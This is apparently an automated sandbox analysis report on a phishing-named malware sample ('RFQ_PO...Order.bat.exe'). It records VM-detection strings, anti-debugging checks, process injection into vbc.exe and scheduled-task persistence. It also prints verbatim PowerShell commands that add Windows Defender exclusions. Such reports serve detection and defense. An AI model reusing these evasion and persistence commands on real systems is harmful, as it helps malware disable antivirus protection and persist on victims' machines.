                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2639227237.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1644079696.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1658196532.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1520674414.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SensorDataService.exe, 00000019.00000003.1430472165.0000000000562000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device.
                  Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 0000001B.00000002.2622744368.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterO
                  Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00L
                  Source: snmptrap.exe, 0000001A.00000002.2614609845.0000000000448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRRw
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&00000097
                  Source: vbc.exe, 0000002A.00000002.2639214777.0000000000DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: SensorDataService.exe, 00000019.00000003.1430472165.0000000000562000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                  Source: ssh-agent.exe, 0000001C.00000002.2624160385.000000000059C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zdVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
                  Source: alg.exe, 0000000B.00000003.1644079696.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1658196532.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1520674414.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP.
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1465820251.000000000B780000.00000004.08000000.00040000.00000000.sdmp, RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1439374797.00000000060E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bhgfSFZU2YsoW1Ik80n
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 0000001B.00000002.2624489595.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 0000001B.00000002.2624489595.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00`[`[
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
                  Source: SensorDataService.exe, 00000019.00000003.1431266016.000000000055E000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1442834952.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                  Source: AppVClient.exe, 0000000F.00000003.1402614844.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1403223081.000000000056E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1402678846.0000000000557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineS
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A95E4 rdtsc 9_2_004A95E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00D51361
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00483594 mov eax, dword ptr fs:[00000030h]42_2_00483594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D11130 mov eax, dword ptr fs:[00000030h]42_2_00D11130
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D53F3D mov eax, dword ptr fs:[00000030h]42_2_00D53F3D
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00D51361
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00D54C7B
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 624008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 910008
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,9_2_00F68550
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
